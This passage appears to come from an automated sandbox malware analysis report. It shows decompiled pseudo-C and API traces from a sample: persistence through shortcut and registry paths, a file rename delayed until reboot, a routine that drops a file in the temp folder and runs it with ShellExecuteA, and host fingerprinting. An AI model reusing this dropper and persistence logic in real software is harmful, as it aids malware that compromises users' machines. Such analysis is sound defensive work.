      • Part of subcall function 0040A4A0: MulDiv.KERNEL32(000009EC,?,00000000), ref: 0040A512
      • Part of subcall function 0040A420: GetDC.USER32(00000000), ref: 0040A44A
      • Part of subcall function 0040A420: GetDeviceCaps.GDI32(00000000,00000058), ref: 0040A45B
      • Part of subcall function 0040A420: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0040A464
      • Part of subcall function 0040A420: ReleaseDC.USER32(00000000,00000000), ref: 0040A46B
      • Part of subcall function 0040A420: MulDiv.KERNEL32(?,00000000,000009EC), ref: 0040A484
      • Part of subcall function 0040A420: MulDiv.KERNEL32(00000000,?,000009EC), ref: 0040A492
    • RedrawWindow.USER32(?,00000000,00000000,00000507), ref: 0040D279
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 93%
    			E004076A0(int __eax, void* __ebx) {
    				int _v8;
    				char* _v12;
    				char* _v16;
    				char _v273;
    				char _v530;
    				void* __ebp;
    				int _t38;
    				signed int _t46;
    				signed int _t50;
    				signed int _t57;
    				intOrPtr _t92;
    				long _t97;
    				long _t99;
    				long _t100;
    				intOrPtr _t102;
    				void* _t104;
    				void* _t108;
    				void* _t109;
    				void* _t111;
    				void* _t112;
    				void* _t113;
    
    				_t38 = __eax;
    				_v8 = __eax;
    				if( *0x40b514 > 0 &&  *0x40b510 != 0) {
    					E00401308( &_v530, 0x40b518);
    					 *((char*)(_t111 + E004012DC(0x40b518) - 0x212)) = 0;
    					E0040133C( &_v530, ".lnk");
    					_t113 = _t112 + 8;
    					_t96 =  &_v530;
    					_t102 =  *0x40a0ac; // 0x401c58
    					_t46 = E00403FC8(0x40b518, __ebx,  &_v530, _t102);
    					asm("sbb eax, eax");
    					if( ~( ~_t46) == 0) {
    						E00401308( &_v530, 0x4078ec);
    						E0040133C( &_v530, 0x40b518);
    						E0040133C( &_v530, 0x4078f0);
    						_t92 =  *0x40a0ac; // 0x401c58
    						E0040133C( &_v530, _t92);
    						_t113 = _t113 + 0x18;
    					}
    					if( *0x40a034 == 0) {
    						_t50 = E00404968(0x80000001, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t50);
    						if(_t38 != 0 &&  *0x40b514 > 0 &&  *0x40b510 != 0) {
    							_t97 =  *0x40b514; // 0x0
    							_t104 =  *0x40b510; // 0x0
    							E0040485C(0x40b518, _t97, _t104);
    							return E0040763C(0x40b518);
    						}
    					} else {
    						_t57 = E00404968(0x80000002, _t96,  &_v530);
    						asm("sbb eax, eax");
    						_t38 =  ~( ~_t57);
    						if(_t38 != 0) {
    							if(_v8 != 0) {
    								_t100 =  *0x40b514; // 0x0
    								_t109 =  *0x40b510; // 0x0
    								E0040485C(0x40b518, _t100, _t109);
    								return E0040763C(0x40b518);
    							}
    							E00401308( &_v273, 0x40b518);
    							_v12 =  &_v273;
    							_v16 = 0;
    							while( *_v12 != 0) {
    								if( *_v12 == 0x5c) {
    									_v16 = _v12;
    								}
    								_v12 = _v12 + 1;
    							}
    							if(_v16 == 0) {
    								_v16 =  &_v273;
    							} else {
    								_v16 = _v16 + 1;
    							}
    							 *_v16 = 0;
    							_v12 = E00403B80(9, 0x19, 0x14);
    							E0040133C(_v16, _v12);
    							E00401440(_v12);
    							E0040133C(_v16, ".txt");
    							_t38 = MoveFileExA( &_v273, 0x40b518, 4);
    							if( *0x40b514 > 0 &&  *0x40b510 != 0) {
    								_t99 =  *0x40b514; // 0x0
    								_t108 =  *0x40b510; // 0x0
    								E0040485C( &_v273, _t99, _t108);
    								return E0040763C( &_v273);
    							}
    						}
    					}
    				}
    				return _t38;
    			}

    APIs
      • Part of subcall function 00403FC8: CoInitialize.OLE32(00000000), ref: 00404001
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00404089
      • Part of subcall function 00403FC8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 004040A7
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • MoveFileExA.KERNEL32(?,0040B518,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00407857
      • Part of subcall function 00404968: SHGetValueA.SHLWAPI(?,00401DAC,?,00000001,00000000,?), ref: 004049B1
      • Part of subcall function 00404968: RegOpenKeyExA.ADVAPI32(?,00401DAC,00000000,000F003F,?), ref: 004049D0
      • Part of subcall function 0040485C: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404886
      • Part of subcall function 0040485C: WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004048A7
      • Part of subcall function 0040485C: FlushFileBuffers.KERNEL32(000000FF), ref: 004048C4
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(000000FF), ref: 004048CE
      • Part of subcall function 0040763C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407658
      • Part of subcall function 0040763C: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040766D
      • Part of subcall function 0040763C: CloseHandle.KERNEL32(000000FF), ref: 0040768A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • _strlen.LIBCMT ref: 0042CB10
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
      • Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 75%
    			E0042CAB5(void* __ecx, intOrPtr* __edx, void* __edi, signed int* _a4, signed int _a8, intOrPtr* _a12) {
    				signed int _v8;
    				intOrPtr* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				signed int _t50;
    				void* _t51;
    				signed int _t53;
    				void* _t56;
    				signed int _t57;
    				void* _t58;
    				signed int* _t64;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr* _t69;
    				void* _t81;
    				signed char _t83;
    				void* _t86;
    				intOrPtr* _t96;
    				unsigned int _t98;
    				intOrPtr* _t104;
    				signed int _t105;
    				void* _t107;
    				signed int _t108;
    				signed int _t110;
    				signed int _t113;
    				signed int _t115;
    				intOrPtr* _t116;
    				void* _t121;
    
    				_t107 = __edi;
    				_t104 = __edx;
    				if( *0x444aa4 == 0) {
    					_t50 = E004259A7(__ecx);
    				}
    				_t113 =  *0x442c34; // 0x0
    				_push(_t107);
    				_t108 = 0;
    				if(_t113 != 0) {
    					while(1) {
    						_t51 =  *_t113;
    						if(_t51 == 0) {
    							break;
    						}
    						if(_t51 != 0x3d) {
    							_t108 = _t108 + 1;
    						}
    						_t113 = _t113 + E00427970(_t113) + 1;
    					}
    					_t50 = E0042A124(_t108 + 1, 4);
    					_t110 = _t50;
    					 *0x442c10 = _t110;
    					if(_t110 == 0) {
    						goto L3;
    					} else {
    						_t115 =  *0x442c34; // 0x0
    						while( *_t115 != 0) {
    							_t3 = E00427970(_t115) + 1; // 0x1
    							_t81 = _t3;
    							if( *_t115 == 0x3d) {
    								L14:
    								_t115 = _t115 + _t81;
    								continue;
    							} else {
    								_t56 = E0042A124(_t81, 1);
    								_pop(_t95);
    								 *_t110 = _t56;
    								if(_t56 == 0) {
    									_t57 = E00422804( *0x442c10);
    									 *0x442c10 =  *0x442c10 & 0x00000000;
    									_t53 = _t57 | 0xffffffff;
    									L17:
    									goto L18;
    								} else {
    									_t58 = L00422AAC(_t56, _t81, _t115);
    									_t121 = _t121 + 0xc;
    									if(_t58 != 0) {
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										_push(0);
    										L00425114();
    										asm("int3");
    										_t96 = _v20;
    										_push(_t81);
    										_push(_t115);
    										 *_t110 = 0;
    										_t116 = _t104;
    										_t105 = _v24;
    										 *_t96 = 1;
    										if(_v28 != 0) {
    											_a4 =  &(_a4[1]);
    											 *_a4 = _t105;
    										}
    										_v8 = 0;
    										do {
    											if( *_t116 != 0x22) {
    												 *_t110 =  *_t110 + 1;
    												if(_t105 != 0) {
    													 *_t105 =  *_t116;
    													_a8 = _t105 + 1;
    												}
    												_t83 =  *_t116;
    												_t116 = _t116 + 1;
    												if(E0042E750(_t83 & 0x000000ff) != 0) {
    													 *_t110 =  *_t110 + 1;
    													if(_a8 != 0) {
    														_a8 = _a8 + 1;
    														 *_a8 =  *_t116;
    													}
    													_t116 = _t116 + 1;
    												}
    												_t105 = _a8;
    												_t96 = _a12;
    												if(_t83 == 0) {
    													_t116 = _t116 - 1;
    												} else {
    													goto L33;
    												}
    											} else {
    												_t83 = 0x22;
    												_t116 = _t116 + 1;
    												_v8 = 0 | _v8 == 0x00000000;
    												goto L33;
    											}
    											L38:
    											_v8 = _v8 & 0x00000000;
    											L39:
    											while( *_t116 != 0) {
    												while(1) {
    													_t65 =  *_t116;
    													if(_t65 != 0x20 && _t65 != 9) {
    														break;
    													}
    													_t116 = _t116 + 1;
    												}
    												if( *_t116 != 0) {
    													if(_a4 != 0) {
    														_a4 =  &(_a4[1]);
    														 *_a4 = _t105;
    													}
    													 *_t96 =  *_t96 + 1;
    													while(1) {
    														_t86 = 1;
    														_t98 = 0;
    														L50:
    														while( *_t116 == 0x5c) {
    															_t116 = _t116 + 1;
    															_t98 = _t98 + 1;
    														}
    														if( *_t116 == 0x22) {
    															if((_t98 & 0x00000001) == 0) {
    																if(_v8 == 0) {
    																	L56:
    																	_t86 = 0;
    																	_v8 = 0 | _v8 == 0x00000000;
    																} else {
    																	_t69 = _t116 + 1;
    																	if( *_t69 != 0x22) {
    																		goto L56;
    																	} else {
    																		_t116 = _t69;
    																	}
    																}
    															}
    															_t98 = _t98 >> 1;
    														}
    														if(_t98 != 0) {
    															do {
    																_t98 = _t98 - 1;
    																if(_t105 != 0) {
    																	 *_t105 = 0x5c;
    																	_t105 = _t105 + 1;
    																}
    																 *_t110 =  *_t110 + 1;
    															} while (_t98 != 0);
    															_a8 = _t105;
    														}
    														_t66 =  *_t116;
    														if(_t66 != 0 && (_v8 != 0 || _t66 != 0x20 && _t66 != 9)) {
    															if(_t86 != 0) {
    																_push(_t66);
    																if(_t105 == 0) {
    																	if(E0042E750() != 0) {
    																		_t116 = _t116 + 1;
    																		 *_t110 =  *_t110 + 1;
    																	}
    																} else {
    																	if(E0042E750() != 0) {
    																		_a8 = _a8 + 1;
    																		 *_a8 =  *_t116;
    																		_t116 = _t116 + 1;
    																		 *_t110 =  *_t110 + 1;
    																	}
    																	_a8 = _a8 + 1;
    																	 *_a8 =  *_t116;
    																}
    																 *_t110 =  *_t110 + 1;
    																_t105 = _a8;
    															}
    															_t116 = _t116 + 1;
    															_t86 = 1;
    															_t98 = 0;
    															goto L50;
    														}
    														if(_t105 != 0) {
    															 *_t105 = 0;
    															_t105 = _t105 + 1;
    															_a8 = _t105;
    														}
    														 *_t110 =  *_t110 + 1;
    														_t96 = _a12;
    														goto L39;
    													}
    												}
    												break;
    											}
    											_t64 = _a4;
    											if(_t64 != 0) {
    												 *_t64 =  *_t64 & 0x00000000;
    											}
    											 *_t96 =  *_t96 + 1;
    											return _t64;
    											goto L82;
    											L33:
    										} while (_v8 != 0 || _t83 != 0x20 && _t83 != 9);
    										if(_t105 != 0) {
    											 *((char*)(_t105 - 1)) = 0;
    										}
    										goto L38;
    									} else {
    										_t110 = _t110 + 4;
    										goto L14;
    									}
    								}
    							}
    							goto L82;
    						}
    						E00422804( *0x442c34);
    						 *0x442c34 =  *0x442c34 & 0x00000000;
    						 *_t110 =  *_t110 & 0x00000000;
    						 *0x444a98 = 1;
    						_t53 = 0;
    						goto L17;
    					}
    				} else {
    					L3:
    					_t53 = _t50 | 0xffffffff;
    					L18:
    					return _t53;
    				}
    				L82:
    			}

    APIs
    • _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C
    • _strlen.LIBCMT ref: 0042CB10
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC), ref: 0042282C
      • Part of subcall function 00425114: GetCurrentProcess.KERNEL32 ref: 0042512A
      • Part of subcall function 00425114: TerminateProcess.KERNEL32(00000000), ref: 00425131
      • Part of subcall function 0042E750: x_ismbbtype_l.LIBCMT ref: 0042E75E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
      • Part of subcall function 00428185: __fltout2.LIBCMT ref: 004281B4
    • __fltout2.LIBCMT ref: 004287D1
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042885E
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • __fltout2.LIBCMT ref: 00428710
      • Part of subcall function 0042F564: ___dtold.LIBCMT ref: 0042F58A
      • Part of subcall function 0042F3FE: _strlen.LIBCMT ref: 0042F499
    • __cftof2_l.LIBCMT ref: 0042878F
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428660
      • Part of subcall function 004285E2: _strlen.LIBCMT ref: 00428684
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • SelectObject.GDI32(?,00000000), ref: 0041E504
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Builds a path under the temp directory from the basename of the string in
    			// __eax, has subcall 00403C28 create and write a file there (CreateFileA with
    			// GENERIC_WRITE/CREATE_ALWAYS, WriteFile, CloseHandle per the APIs list below),
    			// then launches that path with ShellExecuteA.
    			E00407D3C(void* __eax, void* __ecx, void* __edx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v85;
    				char _v342;
    				void* _t34;
    				intOrPtr _t42;
    				void* _t55;
    				intOrPtr _t58;
    
    				_t55 = __ecx;
    				_v8 = __eax;
    				_v342 = 0;
    				// Temp directory into the 0x101-byte stack buffer _v342
    				GetTempPathA(0x101,  &_v342);
    				_v12 = _v8;
    				_v16 = 0;
    				// Scan the input string for the last '/' (0x2f); _v16 points at it
    				while(1) {
    					_t34 = _v12;
    					if( *_t34 == 0) {
    						break;
    					}
    					__eflags =  *_v12 - 0x2f;
    					if( *_v12 == 0x2f) {
    						_v16 = _v12;
    					}
    					_t10 =  &_v12;
    					 *_t10 = _v12 + 1;
    					__eflags =  *_t10;
    				}
    				if(_v16 != 0) {
    					// Step past the slash: _v16 is now the basename
    					_v16 = _v16 + 1;
    					// Helper not shown in this report; presumably appends the basename to the temp path (assumption)
    					E0040133C( &_v342, _v16);
    					// Write the file; on failure, hand the string at 0x40a170 to E00407240 and return
    					if(E00403C28(_v8, _t55,  &_v342) == 0) {
    						_t42 =  *0x40a170; // 0x401e04
    						return E00407240(_t42, __eflags);
    					}
    					// nShowCmd 5 = SW_SHOW
    					_t34 = ShellExecuteA(0, 0,  &_v342, 0, 0, 5);
    					_v20 = _t34;
    					_t66 = _v20 - 0x20;
    					// ShellExecuteA returns a value <= 32 on error: format the code
    					// (E00401864 uses wsprintfA per the APIs list) and pass the message on
    					if(_v20 <= 0x20) {
    						E00401864(_v20,  &_v85);
    						_t58 =  *0x40a16c; // 0x401df8
    						E00401308( &_v342, _t58);
    						E0040133C( &_v342,  &_v85);
    						return E00407240( &_v342, _t66);
    					}
    				}
    				return _t34;
    			}

    APIs
    • GetTempPathA.KERNEL32(00000101,00000000), ref: 00407D5B
      • Part of subcall function 00403C28: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
      • Part of subcall function 00403C28: WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
      • Part of subcall function 00403C28: CloseHandle.KERNEL32(000000FF), ref: 00403E6B
    • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 00407DCA
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
    • TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
      • Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
      • Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 00423F05: RtlUnwind.KERNEL32(00423F30,0?B,?,00000000), ref: 00423F2B
      • Part of subcall function 0042A2CD: __getptd.LIBCMT ref: 0042A2F4
      • Part of subcall function 0042A2CD: __CallSettingFrame@12.LIBVCRUNTIME ref: 0042A340
      • Part of subcall function 0042A52B: __CreateFrameInfo.LIBCMT ref: 0042A553
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A55D
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A56B
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A579
      • Part of subcall function 0042A52B: __getptd.LIBCMT ref: 0042A584
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424204
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424214
      • Part of subcall function 004241FE: __getptd.LIBCMT ref: 00424225
    • __getptd.LIBCMT ref: 0042A660
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A66E
      • Part of subcall function 004241D7: __getptd.LIBCMT ref: 004241DC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • RtlEnterCriticalSection.NTDLL(?), ref: 0042B13D
      • Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
      • Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Execution Graph

    Execution Coverage:21%
    Dynamic/Decrypted Code Coverage:99.9%
    Signature Coverage:8.6%
    Total number of Nodes:1805
    Total number of Limit Nodes:19

    Graph

4501->4503 4508 77471c 17 API calls 4502->4508 4655 778b98 4503->4655 4709 778b6c CreateThread CloseHandle 4505->4709 4511 778ead 4508->4511 4510 778f1e 4727 7738dc RtlEnterCriticalSection 4510->4727 4513 778eb6 4511->4513 4514 778ec8 4511->4514 4512 778f3c 4662 774ba0 GetComputerNameA 4512->4662 4703 774a1c 4513->4703 4519 774a1c 3 API calls 4514->4519 4518 778f46 4522 775468 GetSystemTime 4518->4522 4519->4499 4520 779029 4728 7738ec RtlLeaveCriticalSection 4520->4728 4524 778f4b 4522->4524 4526 775468 GetSystemTime 4524->4526 4525 77903b 4729 775640 SHGetSpecialFolderPathA 4525->4729 4528 778f55 4526->4528 4529 773b80 2 API calls 4528->4529 4532 778f65 4529->4532 4530 779046 4741 7784a4 4530->4741 4676 771440 GetProcessHeap HeapFree 4532->4676 4535 778f7d 4536 778f86 4535->4536 4537 778f9a 4535->4537 4677 778064 RegOpenKeyExA 4536->4677 4538 778064 3 API calls 4537->4538 4540 778f98 4538->4540 4541 778fd7 4540->4541 4543 778fc3 Sleep 4540->4543 4542 779015 4541->4542 4545 779006 4541->4545 4547 778ffc GetCursorPos 4541->4547 4710 777474 4542->4710 4543->4541 4543->4543 4546 77471c 17 API calls 4545->4546 4546->4542 4547->4545 4549 77250c 4548->4549 4549->3957 4549->4549 4551 7719e8 4550->4551 4552 7719b4 4550->4552 4551->3960 4552->4551 4553 771a62 4552->4553 4556 771928 4553->4556 4555 771a6b 4555->4551 4557 77193c 4556->4557 4558 771961 LoadLibraryA GetProcAddress 4557->4558 4558->4555 4766 771258 4559->4766 4561 774509 GetVersionExA 4561->4464 4563 7743f9 4562->4563 4564 774300 GetTokenInformation 4562->4564 4563->4467 4565 774322 GetLastError 4564->4565 4566 7743ef CloseHandle 4564->4566 4565->4566 4567 774331 4565->4567 4566->4563 4767 7713dc GetProcessHeap RtlAllocateHeap 4567->4767 4569 774339 4569->4566 4570 774346 GetTokenInformation 4569->4570 4571 774368 GetSidSubAuthorityCount 4570->4571 4575 7743a2 4570->4575 4573 77437d 4571->4573 4571->4575 4574 774385 GetSidSubAuthority 4573->4574 4573->4575 4574->4575 4768 771440 GetProcessHeap HeapFree 
4575->4768 4577 774555 GetCurrentProcess 4576->4577 4578 77454f 4576->4578 4579 77455e 4577->4579 4578->4577 4578->4579 4580 774567 IsWow64Process 4579->4580 4581 774579 4579->4581 4580->4581 4582 7779bc 4581->4582 4583 7779f1 4582->4583 4584 777a0f RtlInitializeCriticalSection 4583->4584 4769 771258 4584->4769 4586 777a29 RtlInitializeCriticalSection 4586->4478 4588 77442d SetSecurityDescriptorDacl 4587->4588 4591 7744bb CreateMutexA LocalFree 4587->4591 4589 774445 ConvertStringSecurityDescriptorToSecurityDescriptorA 4588->4589 4588->4591 4590 774463 GetSecurityDescriptorSacl 4589->4590 4589->4591 4592 7744a8 LocalFree 4590->4592 4593 774488 SetSecurityDescriptorSacl 4590->4593 4591->4481 4592->4591 4593->4591 4593->4592 4770 7738b0 RegQueryValueExA 4594->4770 4596 778c4b 4771 7738b0 RegQueryValueExA 4596->4771 4598 778c97 4772 773890 RegCloseKey 4598->4772 4600 778ca2 4600->4483 4601->4485 4603 778a0c 4602->4603 4603->4487 4605 7748dc 4604->4605 4606 777a7d GetFileVersionInfoSizeA 4605->4606 4607 777bf5 RtlInitializeCriticalSection 4606->4607 4608 777a9b 4606->4608 4621 7747ac CreateFileA 4607->4621 4773 7713dc GetProcessHeap RtlAllocateHeap 4608->4773 4610 777aa3 GetFileVersionInfoA 4612 777ac7 4610->4612 4620 777bd6 4610->4620 4774 771864 wsprintfA 4612->4774 4614 777b18 4775 771864 wsprintfA 4614->4775 4616 777b55 4776 771864 wsprintfA 4616->4776 4618 777b99 4777 771864 wsprintfA 4618->4777 4778 771440 GetProcessHeap HeapFree 4620->4778 4622 7747e8 CreateFileA 4621->4622 4623 774804 4621->4623 4622->4623 4624 77480a GetFileSize 4623->4624 4625 774855 4623->4625 4624->4625 4626 77481f 4624->4626 4629 777304 4625->4629 4779 7713b4 VirtualAlloc 4626->4779 4628 77482b ReadFile CloseHandle 4628->4625 4630 77733c RegOpenKeyExA 4629->4630 4631 77731b RegOpenKeyExA 4629->4631 4633 77735b 4630->4633 4631->4633 4632 777445 4632->4494 4651 77744c 4632->4651 4633->4632 4780 7738b0 RegQueryValueExA 4633->4780 4635 77737f 4636 77743d 4635->4636 4781 7713dc GetProcessHeap 
RtlAllocateHeap 4635->4781 4790 773890 RegCloseKey 4636->4790 4639 77739c 4782 7713dc GetProcessHeap RtlAllocateHeap 4639->4782 4641 7773ad 4783 7738b0 RegQueryValueExA 4641->4783 4643 7773c7 4644 7759bc 6 API calls 4643->4644 4645 7773e2 4644->4645 4648 7773f3 4645->4648 4784 7772c4 4645->4784 4788 771440 GetProcessHeap HeapFree 4648->4788 4649 777435 4789 771440 GetProcessHeap HeapFree 4649->4789 4652 777469 4651->4652 4653 7772c4 17 API calls 4652->4653 4654 777471 4653->4654 4654->4494 4656 778bcc SHGetSpecialFolderPathA 4655->4656 4657 778ba8 SHGetSpecialFolderPathA 4655->4657 4658 778bc7 4656->4658 4657->4658 4822 777560 4658->4822 4660 778bf5 4661 778b6c CreateThread CloseHandle 4660->4661 4661->4512 4829 778aa4 4661->4829 4663 774beb RegOpenKeyExA 4662->4663 4664 774bcd 4662->4664 4836 7738b0 RegQueryValueExA 4663->4836 4664->4663 4667 774c2c 4837 7738b0 RegQueryValueExA 4667->4837 4668 774c76 4838 7738b0 RegQueryValueExA 4668->4838 4671 774cc0 4839 7738b0 RegQueryValueExA 4671->4839 4672 774d0c 4840 773890 RegCloseKey 4672->4840 4674 774d17 GetVolumeInformationA 4675 774d60 4674->4675 4675->4518 4676->4535 4678 778095 RegDeleteValueA 4677->4678 4679 7780b7 4677->4679 4841 773890 RegCloseKey 4678->4841 4679->4540 4682 7741f4 GetLastError 4681->4682 4683 774217 4681->4683 4682->4683 4684 774201 GetCurrentProcess OpenProcessToken 4682->4684 4685 7742cc 4683->4685 4842 7713dc GetProcessHeap RtlAllocateHeap 4683->4842 4684->4683 4685->4473 4687 77422b GetTokenInformation CloseHandle 4688 77425a AllocateAndInitializeSid 4687->4688 4689 7742c4 4687->4689 4691 7742ba FreeSid 4688->4691 4692 774288 4688->4692 4843 771440 GetProcessHeap HeapFree 4689->4843 4691->4689 4692->4691 4693 774293 EqualSid 4692->4693 4693->4692 4694 7742ac 4693->4694 4694->4691 4696 774733 4695->4696 4844 7713dc GetProcessHeap RtlAllocateHeap 4696->4844 4698 774742 4699 774798 4698->4699 4700 774764 CreateThread SetThreadPriority CloseHandle 4698->4700 4845 774608 4699->4845 4701 7747a1 
